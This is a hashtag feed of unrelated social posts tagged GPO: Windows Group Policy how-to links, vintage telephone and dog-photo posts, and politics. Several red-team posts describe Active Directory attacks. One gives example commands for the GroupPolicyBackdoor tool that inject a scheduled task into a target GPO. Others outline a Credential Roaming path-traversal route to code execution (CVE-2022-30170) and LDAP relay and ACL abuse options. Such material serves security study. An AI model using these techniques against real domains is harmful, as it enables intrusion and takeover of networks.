Preventing account lockouts on shared PCs with Group Policy
https://qiita.com/Shimizu_Kazuya/items/0e536cf193c7981aa4cc?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items
Create GPO to copy a file in a certain location and create a shortcut to that exe on Desktop
Copy a file
Active Directory: the complete guide to configuring an advanced audit policy https://www.it-connect.fr/tuto-strategie-audit-active-directory/ #ActiveDirectory #Cybersécurité #GPO
Pictures from the recent THG Swapmeet at Milton Keynes! For more photos you can always join the official Telecommunications heritage group on Facebook. Swapmeets are available to paid THG members, join here https://membermojo.co.uk/thg
#vintage #telephones #heritage #strowger #THG #swapmeet #telecoms #GPO #PO #Dials
GPO – Word: how to disable the use of OneDrive as the default location? https://www.it-connect.fr/gpo-word-desactiver-utilisation-de-onedrive-comme-emplacement-par-defaut/ #Stratégiedegroupe #Microsoft365 #OneDrive #Word #GPO
Cleaning up Windows 11 bloat the right way.
I wrote a practical tutorial on removing preinstalled Microsoft Store apps for existing users and new profiles, plus the new policy-based removal for Win11 Enterprise/Edu (Intune/GPO). Includes XML + PowerShell you can ship today.
Windows 11 25H2: how to remove the default apps with a GPO or Intune? https://www.it-connect.fr/windows-11-25h2-comment-supprimer-les-applications-par-defaut-avec-une-gpo-ou-intune/ #Stratégiedegroupe #Windows11 #intune #GPO
GroupPolicyBackdoor
#redteam #python #windows #gpo
A post-exploitation tool for various GPO manipulations. Written in Python.
First presented at [DEFCON_33](https://www.synacktiv.com/sites/default/files/2025-08/roland_becard_turning-your-active-directory-into-the-attackers-c2_slides.pdf)
Examples:
```sh
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'
```
```sh
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
```
Example ini:
```ini
[MODULECONFIG]
name = Scheduled Tasks
type = computer
[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"
[MODULEFILTERS]
filters =
    [{
        "operator": "AND",
        "type": "Computer Name",
        "value": "ad01-srv1.corp.com"
    }]
```
Windows 11 25H2: what are the new GPO settings? Here is a summary! https://www.it-connect.fr/windows-11-25h2-nouveaux-parametres-de-gpo/ #Stratégiedegroupe #Microsoft #Windows11 #GPO
Irish Terrier Practises Street Yoga
Was it yoga, or was there another dog just out of frame and this Irish Terrier wanted to be friends?
Irish Terriers are one of the oldest terrier breeds and are nicknamed “daredevils” because of their famously spirited and fearless temperament. During World War I, Irish Terriers were used as messenger dogs in the trenches, carrying communications between units under incredibly dangerous conditions. They were so effective and brave that they earned widespread admiration. One officer wrote that they were “extraordinarily intelligent, faithful, and honest, and a man who has one of them as a companion will never lack a true friend.” That stretching behaviour you see in the photo? It’s actually a natural “play bow”. Dogs use it not just to stretch their muscles but also as a social signal to other dogs (and sometimes humans) that they’re feeling playful and want to engage. So this little terrier might just be inviting passersby on Oliver Plunkett Street to join in the fun!
Aperture ƒ/9, Camera ILCE-7RM5, Focal length 160mm, ISO 1000, Shutter speed 1/500s
#cityPets #Cork #CorkCity #CorkCityCentre #CorkLife #dogPhotography #GPO #GPOCork #Ireland #IrishDogs #IrishPhotos #IrishTerrier #OliverPlunkettStreet #petPhotography #Photo #Photography #shoppingInCork #StreetPhotography #streetScene #terrierStretching #urbanDogs
@mastodonmigration @moira “100% _cannot_ tell that you're watching”
The method used in the #UK by #GPO is as such: “The television receivers are detected by means of the induction magnetic field emanating from the line-scanning coils of the receiver; it is important to note that almost all working television receivers produce this field, that it is independent of whether an outdoor or an indoor aerial is used and that it is not readily possible to screen receivers to reduce the strength of the field to a degree such as to make detection impossible.”
This method is for CRT TVs, so you’ll be safe. 📺☺️
#TV / #TVDetection <https://www.britishtelephones.com/ri/tv.htm>
I've had a PBX box for a while now, and I've been bugging @lpbkdotnet here on a few tips and tricks.
I have the (I don't know what the name of it is), "master telephone" responsible for being able to programme the PBX -- this is the only way this can be done -- including working out extensions for telephones.
In the course of my (albeit very naive/young) #telephony interest, I've come to own a few GPO devices which have a no. 7 handset in them:
https://www.britishtelephones.com/hands7.htm
These aren't common at all.
But.
Ideally, I'd love to be in a position where there were a way to mute any GPO phone, but to have a modified external "light" or some indication that if such a phone were on "mute", that it were obvious.
When I say "mute", GPO telephones have a mechanism to do so in the middle, if such a switch is fitted.
So, @lpbkdotnet -- I guess what I'm asking in your experience is whether:
1. I can get "mute switches" and fit them to any GPO phone?
2. Given the proviso that Handset No. 7 is rare, how might I connect some sort of "external light" indicator to make up for that?
I am aware of the vintage-radio.net forum, but thought I'd find the wisdom of the crowd here first.
Thanks everyone! :)
If Doug Ford was serious about dangerous driving, his #PCPO gov't would have passed the vulnerable road user law by now! It passed 2nd reading in Fall 2021 but committee meetings didn't get held, while the latest attempt failed in Fall 2023. #shame #BikeTO #WalkTO #ONpoli #ONDP #OLP #GPO #VisionZero
RE: https://bsky.app/profile/did:plc:3a4zpq3a5zj3de5ynvtzb4ny/post/3ly4k3kgtmh2s
GPO: how to turn off Wi-Fi automatically when a network cable is plugged in? https://www.it-connect.fr/gpo-comment-couper-le-wi-fi-automatiquement-quand-un-cable-reseau-est-branche/ #Stratégiedegroupe #Windows #GPO
#red_team #LDAP #GPO #ACL #RCE
There is a mechanism called `Credential Roaming`, which is used to reduce the number of certificates issued during users' `AutoEnrollment` operations. The system on which a user logs in reads a special user attribute from `LDAP` (`msPKIAccountCredentials`), which stores the issued certificate itself, and then saves that certificate on the local device. However, this attribute is vulnerable to a `Path Traversal` attack, and we can set it to a value such that the system will automatically write, for example, a .bat file into startup for itself, which leads to `RCE`.
Thus, if the target system is vulnerable, we can try writing into this attribute the special value from the article (https://cloud.google.com/blog/topics/threat-intelligence/apt29-windows-credential-roaming/) and achieve command execution at the user's next logon to the computer.
#red_team #LDAP #GPO #ACL #RCE
And what if there is an `NTLM Relay` to `LDAP`, but the domain is at an old level and neither `Shadow Credentials` nor `RBCD` works?
In that case you can try the following:
- Collect the `LDAP` database and look for a password in account attributes (be sure to remember `unixUserPassword` as well);
- Add a computer account and exploit from it, given sufficient rights over other objects in the domain;
- Remember the option of opening an interactive session with `LDAP` and abusing `ACL`. For example, via the `gain_fullcontrol` cmdlet if you have `GenericAll/WriteDACL` rights. Or exploiting `GPO`, see `GPOddity` (https://github.com/synacktiv/GPOddity).
However, we can get RCE! And this is CVE-2022-30170 (https://cloud.google.com/blog/topics/threat-intelligence/apt29-windows-credential-roaming/), which was discovered by Mandiant specialists.